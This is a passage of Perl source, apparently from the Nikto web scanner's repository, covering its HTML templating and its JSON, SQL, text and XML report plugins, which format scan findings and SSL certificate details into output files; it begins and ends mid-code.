IP-specific link (for host header template)\n    my $link_ip =\n        $protocol . \"://\"\n      . simple_enc($mark->{'ip'}) . \":\"\n      . $mark->{'port'}\n      . simple_enc($mark->{'root'});\n    if ($link_ip !~ /\\/$/) { $link_ip .= '/'; }\n    $variables{\"#TEMPL_LINK_IP#\"} = $link_ip;\n\n# Base link (hostname preferred, IP fallback) - reuse for both TEMPL_LINK_NAME and TEMPL_ITEM_NAME_LINK\n    $variables{\"#TEMPL_LINK_NAME#\"}    = $base_url;\n    $variables{\"#TEMPL_ITEMS_FOUND#\"}  = $mark->{'total_vulns'};\n    $variables{\"#TEMPL_SCAN_START#\"}   = localtime($COUNTERS{'scan_start'});\n    $variables{\"#TEMPL_SCAN_END#\"}     = localtime($COUNTERS{'scan_end'});\n    $variables{\"#TEMPL_SCAN_ELAPSED#\"} = $COUNTERS{'scan_elapsed'} . \" seconds\";\n    $variables{\"#TEMPL_STATISTICS#\"} =\n      \"$COUNTERS{'totalrequests'} requests, $mark->{'total_errors'} errors, $mark->{'total_vulns'} findings\";\n    $variables{\"#TEMPL_START#\"}   = date_disp($mark->{'start_time'});\n    $variables{\"#TEMPL_ELAPSED#\"} = $mark->{'end_time'} - $mark->{'start_time'};\n    my $references = linkify_refs($item->{'refs'}) || '';\n    $variables{\"#TEMPL_REFERENCES#\"} = $references;\n\n    # Process References row - extract row HTML from template and conditionally show/hide\n    # HTML structure is in template file; we process it like SSL rows\n    # Only process if this is an item template (has TEMPL_REFERENCES)\n    if ($template =~ /#TEMPL_REFERENCES#/) {\n        my $host_item_template = $TEMPLATES{'htm_host_item'} || '';\n        my ($references_row_tmpl) =\n          $host_item_template =~ /#TEMPL_REFERENCES_ROW#\\s*(<tr>.*?<\\/tr>)/s;\n\n        if ($references_row_tmpl && $references ne '') {\n\n            # Process row template with variable substitution\n            my $row = $references_row_tmpl;\n            $row =~ s/#TEMPL_REFERENCES#/$references/g;\n            $variables{\"#TEMPL_REFERENCES_ROW_REPLACE#\"} = $row;\n        }\n        else {\n            # Hide References row if no references\n            $variables{\"#TEMPL_REFERENCES_ROW_REPLACE#\"} = \"\";\n        }\n\n        # Set marker variable to empty - it will be replaced along with row HTML\n        $variables{\"#TEMPL_REFERENCES_ROW#\"} = \"\";\n    }\n    else {\n        # Not an item template, ensure variables are set to avoid warnings\n        $variables{\"#TEMPL_REFERENCES_ROW_REPLACE#\"} = \"\";\n        $variables{\"#TEMPL_REFERENCES_ROW#\"}         = \"\";\n    }\n\n    # SSL Info template variables - populate if SSL info is available\n    # HTML structure is in the template; we process rows like other template variables\n    if ($mark->{'ssl'} && defined $mark->{'ssl_cipher'}) {\n        my $ssl_subject  = simple_enc($mark->{'ssl_cert_subject'}  || '');\n        my $ssl_issuer   = simple_enc($mark->{'ssl_cert_issuer'}   || '');\n        my $ssl_ciphers  = simple_enc($mark->{'ssl_cipher'}        || '');\n        my $ssl_altnames = simple_enc($mark->{'ssl_cert_altnames'} || '');\n        my $ssl_cn       = '';\n\n        if ($mark->{'ssl_cert_subject'} =~ /CN=([^$ \\/]+)/) {\n            $ssl_cn = simple_enc($1);\n        }\n\n        # Populate values - HTML structure is in template\n        $variables{\"#TEMPL_SSL_SUBJECT#\"} = $ssl_subject;\n        $variables{\"#TEMPL_SSL_CN#\"}      = $ssl_cn;\n        $variables{\"#TEMPL_SSL_SAN#\"}     = $ssl_altnames;\n        $variables{\"#TEMPL_SSL_CIPHERS#\"} = $ssl_ciphers;\n        $variables{\"#TEMPL_SSL_ISSUER#\"}  = $ssl_issuer;\n\n       # Extract row HTML from template - HTML structure is in template file, extract and process it\n       # Row templates match the structure in htm_host_head.tmpl\n        my $host_head_template = $TEMPLATES{'htm_host_head'} || '';\n        my ($ssl_subject_row_tmpl) =\n          $host_head_template =~ /#TEMPL_SSL_SUBJECT_ROW#\\s*(<tr>.*?<\\/tr>)/s;\n        my ($ssl_cn_row_tmpl)  = $host_head_template =~ /#TEMPL_SSL_CN_ROW#\\s*(<tr>.*?<\\/tr>)/s;\n        my ($ssl_san_row_tmpl) = $host_head_template =~ /#TEMPL_SSL_SAN_ROW#\\s*(<tr>.*?<\\/tr>)/s;\n        my ($ssl_ciphers_row_tmpl) =\n          $host_head_template =~ /#TEMPL_SSL_CIPHERS_ROW#\\s*(<tr>.*?<\\/tr>)/s;\n        my ($ssl_issuer_row_tmpl) =\n          $host_head_template =~ /#TEMPL_SSL_ISSUER_ROW#\\s*(<tr>.*?<\\/tr>)/s;\n\n        # Process row templates with variable substitution - HTML structure comes from template file\n        # Store processed row HTML to replace marker + row HTML in template\n        if ($ssl_subject_row_tmpl) {\n            my $row = $ssl_subject_row_tmpl;\n            $row =~ s/#TEMPL_SSL_SUBJECT#/$ssl_subject/g;\n            $variables{\"#TEMPL_SSL_SUBJECT_ROW_REPLACE#\"} = $row;\n        }\n        else {\n            $variables{\"#TEMPL_SSL_SUBJECT_ROW_REPLACE#\"} = \"\";\n        }\n\n        if ($ssl_cn_row_tmpl && $ssl_cn ne '') {\n            my $row = $ssl_cn_row_tmpl;\n            $row =~ s/#TEMPL_SSL_CN#/$ssl_cn/g;\n            $variables{\"#TEMPL_SSL_CN_ROW_REPLACE#\"} = $row;\n        }\n        else {\n            $variables{\"#TEMPL_SSL_CN_ROW_REPLACE#\"} = \"\";\n        }\n\n        if ($ssl_san_row_tmpl && $ssl_altnames ne '') {\n            my $row = $ssl_san_row_tmpl;\n            $row =~ s/#TEMPL_SSL_SAN#/$ssl_altnames/g;\n            $variables{\"#TEMPL_SSL_SAN_ROW_REPLACE#\"} = $row;\n        }\n        else {\n            $variables{\"#TEMPL_SSL_SAN_ROW_REPLACE#\"} = \"\";\n        }\n\n        if ($ssl_ciphers_row_tmpl) {\n            my $row = $ssl_ciphers_row_tmpl;\n            $row =~ s/#TEMPL_SSL_CIPHERS#/$ssl_ciphers/g;\n            $variables{\"#TEMPL_SSL_CIPHERS_ROW_REPLACE#\"} = $row;\n        }\n        else {\n            $variables{\"#TEMPL_SSL_CIPHERS_ROW_REPLACE#\"} = \"\";\n        }\n\n        if ($ssl_issuer_row_tmpl) {\n            my $row = $ssl_issuer_row_tmpl;\n            $row =~ s/#TEMPL_SSL_ISSUER#/$ssl_issuer/g;\n            $variables{\"#TEMPL_SSL_ISSUER_ROW_REPLACE#\"} = $row;\n        }\n        else {\n            $variables{\"#TEMPL_SSL_ISSUER_ROW_REPLACE#\"} = \"\";\n        }\n\n        # Set marker variables to empty - they'll be replaced along with row HTML\n        $variables{\"#TEMPL_SSL_SUBJECT_ROW#\"} = \"\";\n        $variables{\"#TEMPL_SSL_CN_ROW#\"}      = \"\";\n        $variables{\"#TEMPL_SSL_SAN_ROW#\"}     = \"\";\n        $variables{\"#TEMPL_SSL_CIPHERS_ROW#\"} = \"\";\n        $variables{\"#TEMPL_SSL_ISSUER_ROW#\"}  = \"\";\n    }\n    else {\n        # Hide SSL rows - replace marker + row HTML with empty string\n        $variables{\"#TEMPL_SSL_SUBJECT_ROW_REPLACE#\"} = \"\";\n        $variables{\"#TEMPL_SSL_CN_ROW_REPLACE#\"}      = \"\";\n        $variables{\"#TEMPL_SSL_SAN_ROW_REPLACE#\"}     = \"\";\n        $variables{\"#TEMPL_SSL_CIPHERS_ROW_REPLACE#\"} = \"\";\n        $variables{\"#TEMPL_SSL_ISSUER_ROW_REPLACE#\"}  = \"\";\n\n        # Set marker variables to empty\n        $variables{\"#TEMPL_SSL_SUBJECT_ROW#\"} = \"\";\n        $variables{\"#TEMPL_SSL_CN_ROW#\"}      = \"\";\n        $variables{\"#TEMPL_SSL_SAN_ROW#\"}     = \"\";\n        $variables{\"#TEMPL_SSL_CIPHERS_ROW#\"} = \"\";\n        $variables{\"#TEMPL_SSL_ISSUER_ROW#\"}  = \"\";\n    }\n\n    $variables{\"#ID#\"} = $item->{'nikto_id'};\n\n    # Scanner Messages Handling\n    $variables{\"#TEMPL_SMMSG#\"} = simple_enc($item->{'message'});\n\n    # Positives Handling\n    if ($template =~ /\\#TEMPL_MSG#/) {\n        my $msg = simple_enc($item->{'message'});\n\n        # Message & handling for customized html output\n        # 740000 = multiple index files -- linkify file names\n        if ($item->{'nikto_id'} == 740000) {\n            $item->{'message'} =~ /^(.*: )(.*)$/;\n            $msg = simple_enc($1);\n            my @links;\n            foreach my $f (parse_csv($2)) {    #@files) {\n                $f =~ s/\\s//g;\n                next if $f eq '';\n                my $escaped_f       = simple_enc($f);\n                my $escaped_display = simple_enc($mark->{'display_name'});\n                push(@links,\n                     \"<a href=\\\"$protocol://$escaped_display:$mark->{'port'}/$escaped_f\\\">$escaped_f</a>\"\n                     );\n            }\n            $msg .= join(\", \", @links);\n        }\n\n        my $uri = $item->{'uri'};\n        if (($uri ne '') && ($uri !~ /^$mark->{'root'}/)) { $uri = $mark->{'root'} . $uri; }\n        $variables{\"#TEMPL_URI#\"}         = simple_enc($uri);\n        $variables{\"#TEMPL_MSG#\"}         = $msg;\n        $variables{\"#TEMPL_HTTP_METHOD#\"} = simple_enc($item->{'method'});\n\n        # Reuse base_url for item links - prefer hostname, fall back to IP\n        $variables{\"#TEMPL_ITEM_NAME_LINK#\"} =\n            $protocol . \"://\"\n          . simple_enc($base_host) . \":\"\n          . $mark->{'port'}\n          . $variables{\"#TEMPL_URI#\"};\n    }\n\n    # Replace marker + row HTML in template with processed row HTML (or empty string)\n    # Template has: #TEMPL_SSL_SUBJECT_ROW#\\n<tr>...</tr>\n    # Replace with: processed row HTML (or empty to hide)\n    # Do this BEFORE main variable substitution so we can match the template variable patterns\n    # Use /s flag to match newlines with .\n    $template =~\n      s/#TEMPL_SSL_SUBJECT_ROW#\\s*<tr><td class=\"column-head\">SSL Certificate Subject<\\/td><td>#TEMPL_SSL_SUBJECT#<\\/td><\\/tr>/#TEMPL_SSL_SUBJECT_ROW_REPLACE#/s;\n    $template =~\n      s/#TEMPL_SSL_CN_ROW#\\s*<tr><td class=\"column-head\">SSL Certificate CN<\\/td><td>#TEMPL_SSL_CN#<\\/td><\\/tr>/#TEMPL_SSL_CN_ROW_REPLACE#/s;\n    $template =~\n      s/#TEMPL_SSL_SAN_ROW#\\s*<tr><td class=\"column-head\">SSL Certificate SAN<\\/td><td>#TEMPL_SSL_SAN#<\\/td><\\/tr>/#TEMPL_SSL_SAN_ROW_REPLACE#/s;\n    $template =~\n      s/#TEMPL_SSL_CIPHERS_ROW#\\s*<tr><td class=\"column-head\">SSL Ciphers<\\/td><td>#TEMPL_SSL_CIPHERS#<\\/td><\\/tr>/#TEMPL_SSL_CIPHERS_ROW_REPLACE#/s;\n    $template =~\n      s/#TEMPL_SSL_ISSUER_ROW#\\s*<tr><td class=\"column-head\">SSL Certificate Issuer<\\/td><td>#TEMPL_SSL_ISSUER#<\\/td><\\/tr>/#TEMPL_SSL_ISSUER_ROW_REPLACE#/s;\n\n    # Replace References row marker + HTML with processed row HTML (or empty string)\n    # Template has: #TEMPL_REFERENCES_ROW#\\n  <tr>...</tr> (multi-line with indentation)\n    # Match the exact format with spaces and newlines - use .*? to match across lines\n    if ($template =~ /#TEMPL_REFERENCES_ROW#/) {\n        $template =~\n          s/#TEMPL_REFERENCES_ROW#\\s*<tr>.*?<td class=\"column-head\">References<\\/td>.*?<td>#TEMPL_REFERENCES#<\\/td>.*?<\\/tr>/#TEMPL_REFERENCES_ROW_REPLACE#/s;\n    }\n\n    # Now process main template with all variables (including processed SSL row replacements)\n    foreach my $var (keys %variables) {\n        my $replacement = $variables{$var};\n\n        # Escape $ in replacement to prevent backreference interpretation ($1, $&, etc.)\n        $replacement =~ s/\\$/\\$\\$/g;\n        $template    =~ s/\\Q$var\\E/$replacement/g;\n    }\n\n    return $template;\n}\n###############################################################################\nsub linkify_refs {\n    my $refs = $_[0] || return;\n    my @rs   = split(/ /, $refs);\n    for (my $i = 0 ; $i <= $#rs ; $i++) {\n        $r = $rs[$i];\n        my $escaped_r = simple_enc($r);\n        if ($r =~ /^OSVDB-(\\d+)$/) {\n            my $id = $1;\n            $r = \"<a href='https://vulners.com/osvdb/OSVDB:$id'>$escaped_r</a>\";\n        }\n        elsif ($r =~ /^CVE-\\d{4}-\\d{3,4}/) {\n            my $escaped_url_r = simple_enc($r);\n            $r =\n              \"<a href='https://cve.mitre.org/cgi-bin/cvename.cgi?name=$escaped_url_r'>$escaped_r</a>\";\n        }\n        elsif ($r =~ /^MS-\\d+-\\d+/i) {\n            my $escaped_url_r = simple_enc($r);\n            $r =\n              \"<a href='https://technet.microsoft.com/en-us/library/security/$escaped_url_r.aspx'>$escaped_r</a>\";\n        }\n        elsif ($r =~ /^(CA-\\d{4}-\\d{2})/) {\n            my $escaped_ca = simple_enc($1);\n            $r =\n              \"<a href='https://www.cert.org/historical/advisories/$escaped_ca.cfm'>$escaped_r</a>\";\n        }\n        elsif ($r =~ /^CWE-\\d+/) {\n            my $escaped_url_r = simple_enc($r);\n            $r =\n              \"<a href='https://cwe.mitre.org/data/definitions/$escaped_url_r.html'>$escaped_r</a>\";\n        }\n        elsif ($r =~ /^http/) {\n            my $escaped_url_r = simple_enc($r);\n            $r = \"<a href='$escaped_url_r'>$escaped_r</a>\";\n        }\n        $rs[$i] = $r;\n    }\n    my $out = join(\"</br>\", @rs);\n    $out =~ s/<br>$//;\n    return $out;\n}\n\n###############################################################################\nsub simple_enc {\n    my $var = $_[0] || return;\n    $var =~ s/&/&amp;/g;\n    $var =~ s/</&lt;/g;\n    $var =~ s/>/&gt;/g;\n    $var =~ s/\"/&quot;/g;\n    $var =~ s/'/&#x27;/g;\n    return $var;\n}\n\n1;\n"
  },
  {
    "path": "program/plugins/nikto_report_json.plugin",
    "content": "###############################################################################\n# SPDX-License-Identifier: GPL-3.0-only\n# PURPOSE: JSON Reporting - Multi-host support\n###############################################################################\nour $JSONRPT_ALL  = [];       # Arrayref to hold all hosts' reports\nour $JSONRPT_CURR = undef;    # Scalarref to current host's report\n\nuse JSON;\nuse Time::Piece;\nuse Time::Seconds;\n\n###############################################################################\nsub nikto_report_json_init {\n    use JSON;\n\n    my $id = { name              => \"report_json\",\n               full_name         => \"JSON reports\",\n               author            => \"Sullo\",\n               description       => \"Produces a JSON report.\",\n               report_head       => \\&json_open,\n               report_host_start => \\&json_host_start,\n               report_host_end   => \\&json_host_end,\n               report_close      => \\&json_close,\n               report_item       => \\&json_item,\n               report_ssl_info   => \\&json_ssl_info,\n               report_format     => 'json',\n               copyright         => \"2025 Chris Sullo\"\n               };\n    return $id;\n}\n\n###############################################################################\n# open output file\nsub json_open {\n    my ($file) = @_;\n\n    # Open file with lexical handle (read-write mode for JSON)\n    my $fh;\n    open($fh, \"+>\", $file) || die \"+ ERROR: Unable to open '$file' for write: $@\\n\";\n\n    # Enable autoflush\n    $fh->autoflush(1);\n\n    return $fh;\n}\n\n###############################################################################\n# start output for a host\nsub json_host_start {\n    my ($handle, $mark) = @_;\n\n    # Get current time with timezone\n    my $current_time = localtime;\n    my $start_time   = $mark->{'start_time'} ? localtime($mark->{'start_time'}) : $current_time;\n\n    $JSONRPT_CURR = { host            => $mark->{'vhost'} ? $mark->{'vhost'} : $mark->{'hostname'},\n                      ip              => $mark->{'ip'},\n                      port            => $mark->{'port'},\n                      server_banner   => $mark->{'banner'},\n                      start_time      => $start_time->strftime('%Y-%m-%d %H:%M:%S %z'),\n                      vulnerabilities => []\n                      };\n\n    # Add current host report to the array of all hosts\n    push @$JSONRPT_ALL, $JSONRPT_CURR;\n    return;\n}\n\n###############################################################################\n# write SSL info\nsub json_ssl_info {\n    my ($handle, $mark) = @_;\n\n    # Update the current host report with SSL info\n    return unless defined $JSONRPT_CURR;\n\n    # Extract CN from subject\n    my $cn = '';\n    if ($mark->{'ssl_cert_subject'} =~ /CN=([^$ \\/]+)/) {\n        $cn = $1;\n    }\n\n    $JSONRPT_CURR->{'ssl_info'} = { ciphers  => $mark->{'ssl_cipher'}       || '',\n                                    issuer   => $mark->{'ssl_cert_issuer'}  || '',\n                                    subject  => $mark->{'ssl_cert_subject'} || '',\n                                    cn       => $cn,\n                                    altnames => $mark->{'ssl_cert_altnames'} || ''\n                                    };\n}\n\n###############################################################################\n# end output for a host\nsub json_host_end {\n    my ($handle, $mark) = @_;\n    my $end_time;\n\n    if ($mark->{'end_time'} eq '') {\n        $end_time = localtime;\n    }\n    else {\n        $end_time = localtime($mark->{'end_time'});\n    }\n\n    $JSONRPT_CURR->{'end_time'} = $end_time->strftime('%Y-%m-%d %H:%M:%S %z');\n    return;\n}\n\n###############################################################################\n# close output file\nsub json_close {\n    my ($handle, $mark) = @_;\n    my $json_encoder = JSON->new->utf8->canonical->pretty->convert_blessed;\n    my $json_output  = $json_encoder->encode($JSONRPT_ALL);\n    print $handle $json_output;\n    close($handle);\n    return;\n}\n\n###############################################################################\n# print an item\nsub json_item {\n    my ($handle, $mark, $item) = @_;\n\n    my $uri = $item->{'uri'};\n    if (($uri ne '') && ($mark->{'root'} ne '') && ($uri !~ /^$mark->{'root'}/)) {\n        $uri = $mark->{'root'} . $uri;\n    }\n\n    my $msg  = $item->{'message'};\n    my $uri2 = quotemeta($uri);\n    my $root = quotemeta($mark->{'root'});\n    $msg =~ s/^$uri2:\\s//;\n    $msg =~ s/^$root$uri2:\\s//;\n\n    push @{ $JSONRPT_CURR->{'vulnerabilities'} },\n      { id         => $item->{'nikto_id'},\n        references => $item->{'refs'},\n        method     => $item->{'method'},\n        url        => $uri,\n        msg        => $msg\n        };\n}\n\n1;\n"
  },
  {
    "path": "program/plugins/nikto_report_sqlg.plugin",
    "content": "###############################################################################\n# SPDX-License-Identifier: GPL-3.0-only\n# PURPOSE: SQL Reporting\n###############################################################################\n# Sample table create (mysql):\n#\tcreate table nikto_table (id int(11) not null auto_increment primary key,\n#\tscanid varchar(32), testid varchar(6) not null, ip varchar(15),\n#\thostname text, port int(5), tls tinyint(1), refs text, httpmethod text,\n#\turi text, message text, request blob, response mediumblob);\n# See documentation/nikto_schema_mysql.sql and nikto_schema_postgresql.sql for complete schemas\n###############################################################################\nsub nikto_report_sqlg_init {\n    my $id = { name              => \"report_sqlg\",\n               full_name         => \"Generic SQL reports\",\n               author            => \"Sullo\",\n               description       => \"Produces SQL inserts into a generic database.\",\n               report_head       => \\&sqlg_open,\n               report_host_start => \\&sqlg_host_start,\n               report_item       => \\&sqlg_item,\n               report_ssl_info   => \\&sqlg_ssl_info,\n               report_format     => 'sql',\n               copyright         => \"2013 Chris Sullo\"\n               };\n    return $id;\n}\n\n###############################################################################\n# open output file\nsub sqlg_open {\n    my ($file) = @_;\n    print STDERR \"+ ERROR: Output file not specified.\\n\" if $file eq '';\n\n    # Open file with lexical handle and produce header\n    my $fh;\n    open($fh, \">>\", $file) || die print STDERR \"+ ERROR: Unable to open '$file' for write: $@\\n\";\n\n    # Enable autoflush\n    $fh->autoflush(1);\n\n    # Write header\n    my $opt = $CLI{'all_options'};\n    $opt =~ s/'/\\\\'/g;\n    print $fh \"# $VARIABLES{'name'} - v$VARIABLES{'version'}/$VARIABLES{'core_version'}\\n\";\n    print $fh \"# Options:       $opt\\n\";\n    print $fh \"# Start Time:    \" . localtime($COUNTERS{'scan_start'}) . \"\\n\";\n    print $fh \"# End Time:      \" . localtime($COUNTERS{'scan_end'}) . \"\\n\";\n    print $fh \"\\n\";\n\n    return $fh;\n}\n\n###############################################################################\n# start output\nsub sqlg_host_start {\n    my ($handle, $mark) = @_;\n    my $banner = $mark->{'banner'} || '';\n    my $ssl    = 0;\n    if (defined $mark->{'ssl_cipher'}) { $ssl = 1; }\n    my $hostname = $mark->{'vhost'} ? $mark->{'vhost'} : $mark->{'hostname'};\n\n    my $scanid = $mark->{'scanid'} || '';\n    my $msg = $banner ne '' ? \"Server banner: $banner\" : \"Host scan started\";\n    my $ip = $mark->{'ip'};\n\n    $ip =~ s/'/\\\\'/g;\n    $hostname =~ s/'/\\\\'/g;\n    $msg =~ s/'/\\\\'/g;\n    $scanid =~ s/'/\\\\'/g;\n\n    my $sql =\n      \"insert into nikto_table (scanid, testid, ip, hostname, port, tls, refs, httpmethod, uri, message) values(\";\n    $sql .=\n      \"'$scanid','999958','$ip','$hostname','$mark->{'port'}','$ssl','0','GET','/','$msg');\\n\";\n    print $handle $sql;\n\n    return;\n}\n\n###############################################################################\n# write SSL info\nsub sqlg_ssl_info {\n    my ($handle, $mark) = @_;\n\n    my $hostname     = $mark->{'vhost'} ? $mark->{'vhost'} : $mark->{'hostname'};\n    my $ssl_cipher   = $mark->{'ssl_cipher'}        || '';\n    my $ssl_subject  = $mark->{'ssl_cert_subject'}  || '';\n    my $ssl_issuer   = $mark->{'ssl_cert_issuer'}   || '';\n    my $ssl_altnames = $mark->{'ssl_cert_altnames'} || '';\n    my $ssl          = defined $mark->{'ssl_cipher'} ? 1 : 0;\n    \n    # Extract CN from subject\n    my $ssl_cn = '';\n    if ($ssl_subject =~ /CN=([^$ \\/]+)/) {\n        $ssl_cn = $1;\n    }\n\n    # Build combined SSL info message\n    my $ssl_message = \"SSL/TLS Information - \";\n    $ssl_message .= \"Subject: $ssl_subject\"  if $ssl_subject ne '';\n    $ssl_message .= \"; CN: $ssl_cn\"          if $ssl_cn ne '';\n    $ssl_message .= \"; SAN: $ssl_altnames\"   if $ssl_altnames ne '';\n    $ssl_message .= \"; Ciphers: $ssl_cipher\" if $ssl_cipher ne '';\n    $ssl_message .= \"; Issuer: $ssl_issuer\"  if $ssl_issuer ne '';\n    $ssl_message =~ s/'/\\\\'/g;\n\n    # Single INSERT statement with all SSL info\n    my $sql =\n      \"insert into nikto_table (scanid, testid, ip, hostname, port, tls, refs, httpmethod, uri, message) values(\";\n    $sql .=\n      \"'$mark->{'scanid'}','000137','$mark->{'ip'}','$hostname','$mark->{'port'}','$ssl','0','GET','/','$ssl_message');\\n\";\n    print $handle $sql;\n}\n\n###############################################################################\n# print an item\nsub sqlg_item {\n    my ($handle, $mark, $item) = @_;\n    foreach my $uri (split(' ', $item->{'uri'})) {\n        my $hostname = $mark->{'vhost'} ? $mark->{'vhost'} : $mark->{'hostname'};\n        $hostname = quotemeta($hostname);\n        my $httpmethod = quotemeta($item->{'method'});\n        my $msg        = quotemeta($item->{'message'});\n        my $root       = quotemeta($mark->{'root'});\n        my $rootq      = quotemeta($mark->{'root'});      # temporary, just for regex\n        $uri = quotemeta($uri);\n        my $ssl = $mark->{'ssl_cipher'} ? 1 : 0;\n\n        # Get scanid (generated by core in report_host_start)\n        my $scanid = $item->{'mark'}->{'scanid'} || '';\n        $scanid =~ s/'/\\\\'/g;                             # Escape single quotes\n\n        my $sql =\n          \"insert into nikto_table (scanid, testid, ip, hostname, port, tls, refs, httpmethod, uri, message, request, response) values(\";\n        $sql .=\n          \"'$scanid','$item->{'nikto_id'}','$item->{'mark'}->{'ip'}','$hostname','$item->{'mark'}->{'port'}','$ssl',\";\n        $sql .= \"'$item->{'refs'}','$httpmethod',\";\n\n        if (($uri ne '') && ($root ne '') && ($uri !~ /^$rootq/)) {\n            $sql .= \"'\" . $root . $uri . \"',\";\n        }\n        else {\n            $sql .= \"'$uri',\";\n        }\n\n        $msg =~ s/^$uri:\\s//;\n        $msg =~ s/^$rootq$uri:\\s//;\n        $sql .= \"'$msg',\";\n\n        # Rebuild the request from the hash -- no need to escape as it's base64 encoded\n        my $req = rebuild_request($item->{'request'}, 1, 48000);\n        $sql .= \"'\" . LW2::encode_base64($req, '') . \"',\";\n\n        # response content\n        my $response = rebuild_response($$item{'response'}, 1, 12000000);\n        $sql .= \"'\" . LW2::encode_base64($response, '') . \"');\";\n        print $handle \"$sql\\n\";\n    }\n}\n\n1;\n"
  },
  {
    "path": "program/plugins/nikto_report_text.plugin",
    "content": "###############################################################################\n# SPDX-License-Identifier: GPL-3.0-only\n# PURPOSE: Text Reporting\n###############################################################################\nsub nikto_report_text_init {\n    my $id = { name              => \"report_text\",\n               full_name         => \"Text reports\",\n               author            => \"Tautology\",\n               description       => \"Produces a text report.\",\n               report_head       => \\&text_open,\n               report_host_start => \\&text_host,\n               report_item       => \\&text_item,\n               report_ssl_info   => \\&text_ssl_info,\n               report_format     => 'txt',\n               copyright         => \"2008 Chris Sullo\"\n               };\n    return $id;\n}\n\nsub text_open {\n    my ($file) = @_;\n    print STDERR \"+ ERROR: Output file not specified.\\n\" if $file eq '';\n\n    # Open file with lexical handle and produce header\n    my $fh;\n    open($fh, \">>\", $file) || die print STDERR \"+ ERROR: Unable to open '$file' for write: $@\\n\";\n\n    # Enable autoflush\n    $fh->autoflush(1);\n\n    # Write header\n    print $fh \"- $VARIABLES{'name'} v$VARIABLES{'version'}/$VARIABLES{'core_version'}\\n\";\n\n    return $fh;\n}\n\nsub text_host {\n    my ($handle, $mark) = @_;\n    my ($curr_host, $curr_port);\n    my $hostname = $mark->{'vhost'} ? $mark->{'vhost'} : $mark->{'hostname'};\n    print $handle \"+ Target Host: $hostname\\n\";\n    print $handle \"+ Target Port: $mark->{port}\\n\";\n}\n\nsub text_ssl_info {\n    my ($handle, $mark) = @_;\n    print $handle \"+ SSL Info:           Subject:  $mark->{'ssl_cert_subject'}\\n\";\n\n    # Extract and display CN separately\n    my $cn = '';\n    if ($mark->{'ssl_cert_subject'} =~ /CN=([^$ \\/]+)/) {\n        $cn = $1;\n        print $handle \"                      CN:       $cn\\n\";\n    }\n\n    # Display SAN if present\n    if ($mark->{'ssl_cert_altnames'} ne '') {\n        print $handle \"                      SAN:      $mark->{'ssl_cert_altnames'}\\n\";\n    }\n\n    print $handle \"                      Ciphers:  $mark->{'ssl_cipher'}\\n\";\n    print $handle \"                      Issuer:   $mark->{'ssl_cert_issuer'}\\n\";\n}\n\nsub text_item {\n    my ($handle, $mark, $item) = @_;\n\n    foreach my $uri (split(' ', $item->{uri})) {\n        my $line = \"+ \";\n        if ($item->{method}) { $line .= $item->{method} . \" \" }\n        if (($uri ne '') && ($uri !~ /^$mark->{'root'}/)) {\n            $line .= $mark->{'root'} . $uri . \": \";\n        }\n        $line .= $item->{message};\n        if ($item->{refs} ne \"\") { $line .= \" See: \" . $item->{refs} . \": \" }\n        print $handle \"$line\\n\";\n    }\n}\n\n1;\n"
  },
  {
    "path": "program/plugins/nikto_report_xml.plugin",
    "content": "###############################################################################\n# SPDX-License-Identifier: GPL-3.0-only\n# PURPOSE: XML Reporting - Multi-host support with proper XML handling\n###############################################################################\nour $XMLRPT_ALL  = [];       # Arrayref to hold all hosts' reports\nour $XMLRPT_CURR = undef;    # Scalarref to current host's report\nour $XML_WRITER  = undef;    # XML::Writer instance\nour $XML_HANDLE  = undef;    # File handle\n\nuse XML::Writer;\nuse Time::Piece;\nuse Time::Seconds;\n\n###############################################################################\nsub nikto_report_xml_init {\n    my $id = { name              => \"report_xml\",\n               full_name         => \"XML reports (v2)\",\n               author            => \"Sullo\",\n               description       => \"Produces a proper XML report with validation.\",\n               report_head       => \\&xml_open,\n               report_host_start => \\&xml_host_start,\n               report_host_end   => \\&xml_host_end,\n               report_close      => \\&xml_close,\n               report_item       => \\&xml_item,\n               report_ssl_info   => \\&xml_ssl_info,\n               report_format     => 'xml',\n               copyright         => \"2025 Chris Sullo\"\n               };\n    return $id;\n}\n\n###############################################################################\n# open output file\nsub xml_open {\n    my ($file) = @_;\n    print STDERR \"+ ERROR: Output file not specified.\\n\" if $file eq '';\n\n    # Open file with lexical handle for writing\n    my $fh;\n    open($fh, \">>\", $file) || die print STDERR \"+ ERROR: Unable to open '$file' for write: $@\\n\";\n\n    # Enable autoflush\n    $fh->autoflush(1);\n\n    # Store lexical handle reference in package variable\n    $XML_HANDLE = $fh;\n\n    # Initialize XML writer with proper settings\n    $XML_WRITER = XML::Writer->new(OUTPUT      => $fh,\n                                   DATA_MODE   => 1,\n                                   DATA_INDENT => 2,\n                                   ENCODING    => 'UTF-8',\n                                   UNSAFE      => 0          # Ensure proper escaping\n                                   );\n\n    # Write XML declaration\n    $XML_WRITER->xmlDecl('UTF-8');\n\n    # Write DOCTYPE if DTD is defined\n    if (defined $CONFIGFILE{'NIKTODTD'} && $CONFIGFILE{'NIKTODTD'} ne '') {\n\n        # Resolve DTD path relative to Nikto execution directory\n        my $dtd_path = $CONFIGFILE{'NIKTODTD'};\n        if ($dtd_path !~ /^\\// && defined $CONFIGFILE{'EXECDIR'}) {\n            $dtd_path = \"$CONFIGFILE{'EXECDIR'}/$dtd_path\";\n        }\n        $XML_WRITER->doctype('niktoscans', 'SYSTEM', $dtd_path);\n    }\n\n    # Start root element\n    $XML_WRITER->startTag('niktoscans');\n\n    nprint(\"- XML report initialized with proper encoding and structure\", \"v\", \"report_xml\");\n    return $fh;\n}\n\n###############################################################################\n# start host entry\nsub xml_host_start {\n    my ($handle, $mark) = @_;\n\n    # Initialize current host report\n    $XMLRPT_CURR = { targetip       => $mark->{'ip'},\n                     targethostname => $mark->{'hostname'},\n                     targetport     => $mark->{'port'},\n                     targetbanner   => $mark->{'banner'} || '',\n                     starttime      => date_disp($mark->{'start_time'}),\n                     sitename       => '',\n                     siteip         => '',\n                     hostheader     => $mark->{'vhost'}          || $mark->{'hostname'},\n                     errors         => $mark->{'total_errors'}   || 0,\n                     checks         => $COUNTERS{'total_checks'} || 0,\n                     items          => [],\n                     ssl_info       => undef\n                     };\n\n    # Build site URLs\n    my $protocol = $mark->{'ssl'} ? 'https' : 'http';\n    my $hostname = $mark->{'vhost'} || $mark->{'hostname'};\n\n    $XMLRPT_CURR->{'siteip'} = \"$protocol://$mark->{'ip'}:$mark->{'port'}$mark->{'root'}\";\n    $XMLRPT_CURR->{'siteip'} .= '/' unless $XMLRPT_CURR->{'siteip'} =~ /\\/$/;\n\n    if ($hostname ne '') {\n        $XMLRPT_CURR->{'sitename'} = 